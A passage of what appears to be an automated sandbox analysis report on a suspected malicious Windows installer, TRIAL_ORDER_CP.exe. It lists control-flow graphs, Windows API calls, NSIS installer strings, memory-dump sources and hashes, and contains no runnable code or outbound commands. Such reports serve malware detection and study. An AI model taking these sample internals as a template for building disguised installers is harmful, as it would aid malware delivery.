396->367 398 4031de-4031e0 396->398 397->382 397->396 398->367
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004030B3
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,00000400), ref: 004030CF
                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00406048
                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 0040311B
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TRIAL_ORDER_CP.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 2803837635-3234720581
                                          • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                          • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                          • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                          • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

                                          Control-flow Graph

                                          control_flow_graph 684 406591-40659a 685 40659c-4065ab 684->685 686 4065ad-4065c7 684->686 685->686 687 4067d7-4067dd 686->687 688 4065cd-4065d9 686->688 690 4067e3-4067f0 687->690 691 4065eb-4065f8 687->691 688->687 689 4065df-4065e6 688->689 689->687 693 4067f2-4067f7 call 406554 690->693 694 4067fc-4067ff 690->694 691->690 692 4065fe-406607 691->692 695 4067c4 692->695 696 40660d-406650 692->696 693->694 698 4067d2-4067d5 695->698 699 4067c6-4067d0 695->699 700 406656-406662 696->700 701 406768-40676c 696->701 698->687 699->687 702 406664 700->702 703 40666c-40666e 700->703 704 4067a0-4067a4 701->704 705 40676e-406775 701->705 702->703 710 406670-40668e call 406422 703->710 711 4066a8-4066ab 703->711 706 4067b4-4067c2 lstrlenW 704->706 707 4067a6-4067af call 406591 704->707 708 406785-406791 call 406554 705->708 709 406777-406783 call 40649b 705->709 706->687 707->706 723 406796-40679c 708->723 709->723 722 406693-406696 710->722 712 4066ad-4066b9 GetSystemDirectoryW 711->712 713 4066be-4066c1 711->713 718 40674b-40674e 712->718 719 4066d3-4066d7 713->719 720 4066c3-4066cf GetWindowsDirectoryW 713->720 725 406760-406766 call 406802 718->725 726 406750-406753 718->726 719->718 727 4066d9-4066f7 719->727 720->719 722->726 728 40669c-4066a3 call 406591 722->728 723->706 724 40679e 723->724 724->725 725->706 726->725 729 406755-40675b lstrcatW 726->729 731 4066f9-4066ff 727->731 732 40670b-406717 call 406948 727->732 728->718 729->725 737 406707-406709 731->737 740 40671f-406723 732->740 737->732 739 406745-406749 737->739 739->718 741 406725-406738 SHGetPathFromIDListW CoTaskMemFree 740->741 742 40673a-406743 740->742 741->739 741->742 742->727 742->739
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 004066C9
                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
                                          • CoTaskMemFree.OLE32(00000000,?,?,00000007,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 00406730
                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 0040675B
                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?), ref: 004067B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 4024019347-2097564478
                                          • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                          • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                          • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                          • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

                                          Control-flow Graph

                                          control_flow_graph 743 4055d9-4055ee 744 4055f4-405605 743->744 745 4056a5-4056a9 743->745 746 405610-40561c lstrlenW 744->746 747 405607-40560b call 406591 744->747 749 405639-40563d 746->749 750 40561e-40562e lstrlenW 746->750 747->746 752 40564c-405650 749->752 753 40563f-405646 SetWindowTextW 749->753 750->745 751 405630-405634 lstrcatW 750->751 751->749 754 405652-405694 SendMessageW * 3 752->754 755 405696-405698 752->755 753->752 754->755 755->745 756 40569a-40569d 755->756 756->745
                                          APIs
                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,00000000,0079A700,75D223A0), ref: 00405611
                                          • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,00000000,0079A700,75D223A0), ref: 00405621
                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,00000000,0079A700,75D223A0), ref: 00405634
                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll), ref: 00405646
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                          • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405686
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll
                                          • API String ID: 2531174081-2701989606
                                          • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                          • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                          • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                          • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

                                          Control-flow Graph

                                          control_flow_graph 757 4032d9-4032f0 758 4032f2 757->758 759 4032f9-403302 757->759 758->759 760 403304 759->760 761 40330b-403310 759->761 760->761 762 403320-40332d call 4034d1 761->762 763 403312-40331b call 4034e7 761->763 767 403333-403337 762->767 768 4034bf 762->768 763->762 769 40346a-40346c 767->769 770 40333d-403363 GetTickCount 767->770 771 4034c1-4034c2 768->771 772 4034ac-4034af 769->772 773 40346e-403471 769->773 774 4034c7 770->774 775 403369-403371 770->775 776 4034ca-4034ce 771->776 777 4034b1 772->777 778 4034b4-4034bd call 4034d1 772->778 773->774 779 403473 773->779 774->776 780 403373 775->780 781 403376-403384 call 4034d1 775->781 777->778 778->768 791 4034c4 778->791 784 403476-40347c 779->784 780->781 781->768 790 40338a-403393 781->790 787 403480-40348e call 4034d1 784->787 788 40347e 784->788 787->768 794 403490-40349c call 4060f6 787->794 788->787 793 403399-4033b9 call 406aa3 790->793 791->774 799 403462-403464 793->799 800 4033bf-4033d2 GetTickCount 793->800 801 403466-403468 794->801 802 40349e-4034a8 794->802 799->771 803 4033d4-4033dc 800->803 804 40341d-40341f 800->804 801->771 802->784 805 4034aa 802->805 806 4033e4-403415 MulDiv wsprintfW call 4055d9 803->806 807 4033de-4033e2 803->807 808 403421-403425 804->808 809 403456-40345a 804->809 805->774 816 40341a 806->816 807->804 807->806 812 403427-40342e call 4060f6 808->812 813 40343c-403447 808->813 809->775 810 403460 809->810 810->774 817 403433-403435 812->817 815 40344a-40344e 813->815 815->793 818 403454 815->818 816->804 817->801 819 403437-40343a 817->819 818->774 819->815
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CountTick$wsprintf
                                          • String ID: ... %d%%$STy
                                          • API String ID: 551687249-2882605797
                                          • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                          • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                          • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                          • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

                                           Control-flow Graph
                                           • Function 004068D8: calls GetSystemDirectoryW, wsprintfW, LoadLibraryExW (graph rendered as an image in the original report)
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                          • wsprintfW.USER32 ref: 0040692A
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME
                                          • API String ID: 2200240437-1106614640
                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                          • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

                                           Control-flow Graph
                                           • Function 70681817: calls GlobalFree, FreeLibrary (graph rendered as an image in the original report)
                                          APIs
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E74
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E79
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E7E
                                          • GlobalFree.KERNEL32(00000000), ref: 706818C5
                                          • FreeLibrary.KERNEL32(?), ref: 7068194B
                                          • GlobalFree.KERNEL32(00000000), ref: 70681970
                                            • Part of subcall function 7068243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7068246F
                                            • Part of subcall function 70682810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70681896,00000000), ref: 706828E0
                                            • Part of subcall function 70681666: wsprintfW.USER32 ref: 70681694
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                           • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                          • String ID:
                                          • API String ID: 3962662361-3916222277
                                          • Opcode ID: dc459d145fb0410a3e8e06f140093215237e80c9026ee1c2efc48123a606c590
                                          • Instruction ID: 679e1d26d1c74e8d00a9a125de36a28ccc654ad205eea3a138e0b953e8dce8bf
                                          • Opcode Fuzzy Hash: dc459d145fb0410a3e8e06f140093215237e80c9026ee1c2efc48123a606c590
                                          • Instruction Fuzzy Hash: DF41B1F2400205AFCF119F24DDB9BCD37BDAF04310F144469FA46AE2CAEBB494848764

                                           Control-flow Graph
                                           • Function 00406073: calls GetTickCount, GetTempFileNameW (graph rendered as an image in the original report)
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00406091
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-944333549
                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                          • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768

                                           Control-flow Graph
                                           • Function 00406422: calls RegQueryValueExW, RegCloseKey (graph rendered as an image in the original report)
                                          APIs
                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,00000000,?,?,?,?,Call,?,00000000,00406693,80000002), ref: 00406468
                                          • RegCloseKey.KERNELBASE(?,?,?), ref: 00406473
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: Call
                                          • API String ID: 3356406503-1824292864
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4

                                          Control-flow Graph

                                          APIs
                                          • GlobalSize.KERNEL32(00000000), ref: 706810AA
                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 706810B9
                                          • GlobalFree.KERNEL32(00000000), ref: 706810D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$AllocFreeSize
                                          • String ID:
                                          • API String ID: 465308736-0
                                          • Opcode ID: 9def485e03fd74ec4405220c08ece85bfa5d60a30a3f7f5be2c864759947e060
                                          • Instruction ID: f6baa4488325d2e770d7588d8f55ac30a28499132d8714945248db6e4312c9a6
                                          • Opcode Fuzzy Hash: 9def485e03fd74ec4405220c08ece85bfa5d60a30a3f7f5be2c864759947e060
                                          • Instruction Fuzzy Hash: BA0152F35007056FC711AFB66C7995F77ED9B882107104126FA09DB3C0EE7499814A65

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E74
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E79
                                            • Part of subcall function 70681BFF: GlobalFree.KERNEL32(?), ref: 70681E7E
                                          • CloseHandle.KERNELBASE(00000000), ref: 706817DC
                                            • Part of subcall function 70681312: GlobalAlloc.KERNEL32(00000040,?,?,706815FE,?), ref: 70681328
                                            • Part of subcall function 70681312: lstrcpynW.KERNEL32(00000004,?,?,706815FE,?), ref: 7068133E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$AllocCloseHandlelstrcpyn
                                          • String ID:
                                          • API String ID: 363591596-0
                                          • Opcode ID: efbe13558de39e405aff14f8e785af987c800f2050654c51a200aebdd3321317
                                          • Instruction ID: 959aa26c9ba416cf11ab9efc6aab1f62e63258d48171042429b97174f1200824
                                          • Opcode Fuzzy Hash: efbe13558de39e405aff14f8e785af987c800f2050654c51a200aebdd3321317
                                          • Instruction Fuzzy Hash: BE01A1F3404340AFC3519B75D82ABCE37ECAF40314F240919F5959E3C4EB74A8808BAA

                                           Control-flow Graph
                                           • Function 00401389: calls MulDiv, SendMessageW (graph rendered as an image in the original report)
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                          • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                          • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                          • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                          • GetLastError.KERNEL32 ref: 00405AF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                          • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                          • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9
                                          APIs
                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                          • CloseHandle.KERNEL32(?), ref: 00405B6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                          • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                          • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                          • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                            • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                            • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                            • Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                          Memory Dump Source
